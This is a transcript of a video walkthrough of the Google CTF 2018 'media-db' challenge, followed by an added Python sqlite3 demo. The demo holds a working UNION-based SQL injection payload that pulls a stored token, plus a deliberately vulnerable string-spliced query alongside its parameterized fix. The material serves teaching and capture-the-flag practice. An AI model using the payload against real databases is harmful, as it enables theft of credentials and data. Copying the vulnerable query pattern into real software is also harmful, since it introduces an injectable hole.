Okay, so we're continuing. This is a part of a series looking at the 2018 Capture the Flag by Google. This was brought to my attention by two YouTubers that I have really no affiliation with other than I subscribe to them: LiveOverflow and John Hammond. John Hammond I just recently started watching, I've only watched a handful of videos, but they're very good, check him out. I did comment on one of his videos and he replied to the comment and let me know that he actually has learned a lot from my videos. So that's great: he's a viewer of mine, and I'm a viewer of his, and the world goes around. Okay.

Also, if you go to gitlab.com, forward slash metalx1000, forward slash capital CTF, you can download my project here, which has all the scripts that I'm showing in here that automate all the capture the flags that I'm going through for this year.

Today we're looking at media-db, media database. And here's the synopsis... synopsis, synopsis. Yeah, the description: "The gatekeeper software gives you access to a custom database to organize a music playlist. It looks like it might also be connected to the smart fridge to play custom door alarms. Maybe we can grab the OAuth token that gets us closer to cake."

Here we have a netcat command to connect to a server, like we have in previous ones. And when I originally took this one, I was stumped for a little bit, and then I realized there was also an attachment. So we want to use this to connect to this server, but you also want to download the attachment. So let me go ahead and I will copy that, and first we'll just look at the server. I'll use netcat and I will paste in that server, port 1337 (leet), and here's our database. I can press one, type in, you know, Bob for the artist name, "Bob song", enter. And now if I hit two I can play an artist, Bob, and it says, you know, "Bob song" by Bob. We can also play a song.
Let's see what happens if I just type Bob. Yeah, it doesn't come up after the full name. And then four will shuffle through your artists. So let me just, just for fun, add another one, Tom. And, well, it didn't ask me for a song title. Oh, I added... what did I add? I added an artist. And we'll add a song, whatever, Tom. I'm just adding things in there to show you. "Tom song". Great. And if we say add a song... oops. Let's reconnect. We've got this connected. Fine, one. I can say "Bob's song". What's the song name? That was a title name. Anyway, we'll say "top Bob song" again, hit enter. Now if I hit four, boom, we crashed the program. Okay, so what caused that? We'll look at this a little bit more.

So let me go ahead and run my script in here, media_db.sh, and here I kind of walk you through: we download the zip, the zip archive, extract it, and inside that is a Python code. So we have the Python code. I'd hit enter to continue. So this is just my script kind of walking you through. It looks like we're working with SQL. We have two tables, media and oauth tokens. We can see that oauth tokens has the flag, because we see this. We'll look at the entire Python script here in a moment, but we have these lines here showing that there's a table here, a table here, and then you can see we can insert, insert into this table. We can see flag. So it just kind of tells us that this table contains our flag. Go ahead and hit enter.

So we can see that we're adding things into the database, or at least we're retrieving things from that, that is, reading things with that database. They used single quotes here, and that's why when we said "Bob's song", because we used the apostrophe, which is the same as a single quote, it messes this up. And so the next thing in my script does this as an example.
Let's try injecting some random stuff. We'll add a song and put this as the artist, with the exclamation, or single quote, there, and whatever we want for the song title. Then tell it to play a random song with option four. So we do that and, boom, it crashes the program, because with that single quote it's thinking it's looking for a new SQL command, and this is not a SQL command, so it crashes. So it looks like it crashed the menu. That's good.

So now let's try some SQL injection. We'll combine the original request with a request for, I spelled everything wrong there, the OAuth table. So originally, the original thing I tried, because I've only done a little bit of playing around with SQL injection in the past, is I tried doing the single quote, select... I said "select all from oauth tokens", and that didn't work. What we need to use is the UNION command, which combines the two commands. So from my understanding, it's taking this command that I'm adding and combining it with the original one, so that it doesn't... so it continues through. So we hit enter there, and you can see that it dumps this as an artist name and our song name and a title, and there we go. And then I trim it down: that is our token.

So real quick, let's look at the Python code here. So we can see that we're running... it's a Python code. So this is basically the program that's running on the server, and the fact that we were able to get a copy of this allows us to see what's going on. So we're using SQLite, or "sequel light" if you want to say it like that, but I'm pretty sure it's supposed to be SQLite3, which is basically, you know, it's a database, usually in a single file, unlike MySQL, which runs as a server normally. This, you'll have... we're basically connecting to a folder in the server and there is a file on there. Anyway, it doesn't really matter for what we're talking about, you know. Here's our main menu again. We can see that we're connecting it to, you know, I guess memory, a database.
It's running in memory. That's not really important. Again, these are the lines that were important right here. Again, when you're doing these, you know, capture the flags, I'm looking for keywords: CTF and flags. So, you know, when I first opened this, this caught my eye right here. Also anything that says OAuth. So again, we can see that we have two tables and that this one, the oauth tokens, has the flag. And again, when we look through this, we can see that when we're selecting, that means that we're reading something from the database. So we're selecting artist, song from the media table where artist equals something, and that's where we're injecting something new. We're saying... actually we're using this random one down here, but still, still using single quotes. And basically, again, we're putting that single quote, that quotation... or not that, that single quote, apostrophe. Basically, let me come down here. Let's see.

So basically, when we're doing a request, if we request something like this, it's seeing this and saying, oh, we're looking for a new command here. We're finishing this and starting this. Putting something random in there like that will crash it. But if we put in our code with the UNION and selecting all from the OAuth, it's going to run that, and that's how we get our output. And that's pretty much it.

Again, you can look through my shell script here, which automates and kind of walks you through the process. Again, here it starts off by removing the Python code if it already exists, but I leave it in there at the end so you can look through it. We're gonna wget this zip file, unzip it, and remove the original zip file just to clean things up.
Then I just, you know, basically, I walk you through all this. This is just output so you know what's going on. And then here's a command: we're echoing all this, which is basically saying select option one, insert this as the artist name, insert this as a song name, and then press four to randomly play that, and we're saying all that to this server. And that, obviously, again crashes the Python script. Next we come down here and we do the same thing, but this time instead of putting in random gibberish, we're running our SQL injection command, which is this right here, saying the same thing to that server. And then I do that same exact thing again, but here at the end I then grep for CTF, tail 1 to grab the last instance of that, and then I use the cut command to get just our flag. And that's how, at the end of the script, it gives you the proper flag you can copy and paste into the Google website.

And that is it. I hope you're enjoying the series. Please visit my website, which is filmsbykris.com, that's Kris with a K. There's a link in the description that you can search through all my videos. You can also go to the support section if you want to support me through Patreon or PayPal. There's also a Patreon link in the description of this video. If you can't do that, please like, share, subscribe, comment, all that good stuff. I do thank you for watching, as always. I hope that you have a great day.
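Added example, not the video's script and not the challenge's own source: a small sqlite3 stand-in for the media-db program described in the video. It reproduces the three behaviours the walkthrough shows (a stray single quote in a stored artist name crashes the "play random" query, a UNION glued onto that same query surfaces the oauth tokens row as if it were artist/song, and a bound parameter treats the identical input as plain data). Table names follow the video's description; the column names, the placeholder flag value, the `choose` hook and all function names are my assumptions.

```python
import random
import sqlite3

# Placeholder flag value (constructed; not the challenge's real token).
FLAG = "CTF{placeholder_flag}"


def build_db():
    """In-memory stand-in for the challenge database (schema is assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE media (artist TEXT, song TEXT);
        CREATE TABLE oauth_tokens (token TEXT);
    """)
    conn.execute("INSERT INTO oauth_tokens VALUES (?)", (FLAG,))
    return conn


def add_song(conn, artist, song):
    """Menu option 1. The insert is parameterized, so any artist name is stored
    verbatim; the problem only surfaces later, when that name is replayed."""
    conn.execute("INSERT INTO media VALUES (?, ?)", (artist, song))


def play_artist_vulnerable(conn, artist):
    """The pattern the video points at: the name is spliced into the SQL text
    inside single quotes, so a quote in the name changes the statement."""
    query = "SELECT artist, song FROM media WHERE artist = '%s'" % artist
    return conn.execute(query).fetchall()


def play_random_vulnerable(conn, choose=random.choice):
    """Menu option 4: pick a stored artist and replay it through the vulnerable
    query. This is second-order injection: the payload arrived via a safe insert."""
    artists = [row[0] for row in conn.execute("SELECT DISTINCT artist FROM media")]
    return play_artist_vulnerable(conn, choose(artists))


def play_artist_safe(conn, artist):
    """Hardened form: a bound parameter is data, never SQL, whatever it holds."""
    return conn.execute(
        "SELECT artist, song FROM media WHERE artist = ?", (artist,)
    ).fetchall()


def outcome(fn, *args):
    """Return ('rows', rows) or ('error', message), mirroring a menu program
    that either prints results or dies on a sqlite error."""
    try:
        return ("rows", fn(*args))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = build_db()
    add_song(db, "Bob", "Bob song")
    print(outcome(play_artist_vulnerable, db, "Bob"))
    # An apostrophe ends the quoted string early: the crash seen with option 4.
    print(outcome(play_artist_vulnerable, db, "Bob's"))
    # The UNION from the video appends a second SELECT with the same column
    # count, so the token row comes back in the artist/song slots.
    payload = "' UNION SELECT token, 'x' FROM oauth_tokens -- "
    add_song(db, payload, "x")
    print(outcome(play_random_vulnerable, db, choose=lambda xs: xs[-1]))
    # The same stored name through a parameterized query is just a name.
    print(outcome(play_artist_safe, db, payload))
```

The `-- ` at the end of the payload comments out the trailing quote the original query supplies, which is why the statement parses; the parameterized version never reaches that situation because the driver sends the name separately from the SQL text.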